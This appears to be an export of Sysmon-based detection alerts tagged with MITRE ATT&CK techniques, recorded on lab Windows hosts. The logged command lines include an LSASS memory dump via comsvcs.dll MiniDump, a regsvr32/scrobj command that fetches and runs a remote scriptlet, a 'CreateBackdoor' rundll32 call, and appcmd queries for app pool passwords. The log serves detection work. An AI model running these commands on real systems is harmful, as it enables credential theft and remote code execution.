[ T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
26
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 17:01:34.418
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\samlib.dll
6.1.7601.23677 (win7sp1_ldr.170209-0600)
SAM Library DLL
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
26
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 17:01:34.418
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\samlib.dll
6.1.7601.23677 (win7sp1_ldr.170209-0600)
SAM Library DLL
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243550
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.388
747F3D96-9F69-5E75-0000-001055912000
8160
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5889
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.310
365ABB72-3D6D-5CEB-0000-00109767FF00
3096
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243550
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.388
747F3D96-9F69-5E75-0000-001055912000
8160
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
244866
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 21:45:04.909
747F3D96-8AE0-5E76-0000-0010933B8003
7708
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\windows\system32\cmd.exe"
c:\Users\Public\
MSEDGEWIN10\IEUser
747F3D96-06A4-5E76-0000-002087DE0200
0x2de87
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-06AA-5E76-0000-001046E10400
4668
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.128.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
17289
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-13 18:03:20.485
365ABB72-B167-5CD9-0000-001062160C00
2476
C:\Windows\System32\regsvr32.exe
IEWIN7\IEUser
tcp
true
false
10.0.2.15
IEWIN7
49159
false
151.101.128.133
443
https
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243550
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.388
747F3D96-9F69-5E75-0000-001055912000
8160
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
25
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 17:01:34.138
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\cryptdll.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Cryptography Manager
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
25
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 17:01:34.138
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\cryptdll.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Cryptography Manager
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5886
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.230
365ABB72-3D6D-5CEB-0000-0010D763FF00
3240
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full)",1,"
1
5
4
1
0
0x8000000000000000
32154
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-30 12:54:08.331
747F3D96-1C70-5D69-0000-0010C9661F00
2888
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1B6A-5D69-0000-0020E5810E00
0xe81e5
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-1C70-5D69-0000-0010D4551F00
1144
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"
1
5
4
1
0
0x8000000000000000
32154
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-30 12:54:08.331
747F3D96-1C70-5D69-0000-0010C9661F00
2888
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1B6A-5D69-0000-0020E5810E00
0xe81e5
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-1C70-5D69-0000-0010D4551F00
1144
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"
1
5
4
1
0
0x8000000000000000
32154
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-30 12:54:08.331
747F3D96-1C70-5D69-0000-0010C9661F00
2888
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1B6A-5D69-0000-0020E5810E00
0xe81e5
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-1C70-5D69-0000-0010D4551F00
1144
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"
1
5
4
1
0
0x8000000000000000
32154
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-30 12:54:08.331
747F3D96-1C70-5D69-0000-0010C9661F00
2888
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1B6A-5D69-0000-0020E5810E00
0xe81e5
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-1C70-5D69-0000-0010D4551F00
1144
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"
1
5
4
1
0
0x8000000000000000
32154
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-30 12:54:08.331
747F3D96-1C70-5D69-0000-0010C9661F00
2888
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1B6A-5D69-0000-0020E5810E00
0xe81e5
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-1C70-5D69-0000-0010D4551F00
1144
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"
8
2
4
8
0
0x8000000000000000
5227
Microsoft-Windows-Sysmon/Operational
DESKTOP-PIU87N6
2020-09-28 12:47:36.204
BC47D85C-DB68-5F71-0000-0010B237AB01
3352
C:\Windows\System32\rdrleakdiag.exe
BC47D85C-FAA9-5F68-0000-0010D9590000
668
C:\Windows\System32\lsass.exe
3468
0x00007FF8C72C5EC0
C:\WINDOWS\SYSTEM32\ntdll.dll
",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5883
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.150
365ABB72-3D6D-5CEB-0000-00101760FF00
2104
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( "C:\Windows\system32\whoami.exe" /user) ,1,"
1
5
4
1
0
0x8000000000000000
24
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1033,technique_name=System Owner/User Discovery
2019-04-18 17:00:09.677
365ABB72-AD19-5CB8-0000-0010F4F40C00
3980
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /user
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-AB27-5CB8-0000-002021CA0000
0xca21
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1,"
1
5
4
1
0
0x8000000000000000
24
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1033,technique_name=System Owner/User Discovery
2019-04-18 17:00:09.677
365ABB72-AD19-5CB8-0000-0010F4F40C00
3980
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /user
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-AB27-5CB8-0000-002021CA0000
0xca21
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"
1
5
4
1
0
0x8000000000000000
17287
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-13 18:03:19.497
365ABB72-B167-5CD9-0000-001062160C00
2476
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-B0EC-5CD9-0000-00201D340100
0x1341d
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-B0EC-5CD9-0000-0010D9D20000
944
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
17287
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-13 18:03:19.497
365ABB72-B167-5CD9-0000-001062160C00
2476
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-B0EC-5CD9-0000-00201D340100
0x1341d
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-B0EC-5CD9-0000-0010D9D20000
944
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
17287
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-13 18:03:19.497
365ABB72-B167-5CD9-0000-001062160C00
2476
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-B0EC-5CD9-0000-00201D340100
0x1341d
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-B0EC-5CD9-0000-0010D9D20000
944
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1,"
1
5
4
1
0
0x8000000000000000
5275
Microsoft-Windows-Sysmon/Operational
PC04.example.corp
2019-03-17 20:18:09.593
365ABB72-AB81-5C8E-0000-00102E9E0C00
3892
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\Windows\system32\
PC04\IEUser
365ABB72-A960-5C8E-0000-002004C00300
0x3c004
1
High
MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-173D-5C8F-0000-00102A6A0000
608
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
